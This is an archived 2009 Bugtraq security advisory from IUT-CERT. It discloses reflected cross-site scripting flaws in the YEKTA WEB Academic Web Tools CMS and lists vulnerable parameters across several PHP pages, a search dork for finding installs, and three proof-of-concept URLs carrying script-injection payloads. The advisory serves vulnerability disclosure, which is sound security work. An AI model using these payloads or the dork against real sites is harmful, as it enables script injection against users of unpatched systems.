lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20090301115813.25631.qmail@securityfocus.com>
Date: 1 Mar 2009 11:58:13 -0000
From: mr.faghani@...il.com
To: bugtraq@...urityfocus.com
Subject: YEKTA WEB Academic Web Tools CMS Multiple XSS

============================================ IUT-CERT ============================================

 Title: Academic Web Tools CMS Multiple XSS
 Vendor: www.yektaweb.com
 Vulnerable Version: 1.5.7 and priors
 Type: XSS
 Fix: N/A
 Dork: AWT YEKTA

============================================  nsec.ir ============================================

Description:
------------------

	YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university
	affairs such as conferences, journals and etc.
    The built-in filter of this package can not prevent XSS attack on some parameters.



Vulnerabilities:
------------------

	1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters.
	http://yoursite/page.php?sid=[XSS]
	http://yoursite/page.php?logincase=[XSS]
	http://yoursite/page.php?redirect=[XSS]
	
	2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters.
	http://yoursite/page_arch.php?sid=[XSS]
	http://yoursite/page_arch.php?logincase=[XSS]
	http://yoursite/page_arch.php?redirect=[XSS]


	3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters.
	http://yoursite/login.php?sid=[XSS]
	http://yoursite/login.php?logincase=[XSS]
	http://yoursite/login.php?redirect=[XSS]

	4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters.
	http://yoursite/login.php?sid=[XSS]
	http://yoursite/login.php?logincase=[XSS]
	http://yoursite/login.php?redirect=[XSS]


Exploit/PoC:
------------------


Example: 
		http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
		http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
		http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>


Solution:
------------------

		Input Validation Filter should be patched.


Credit: 
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ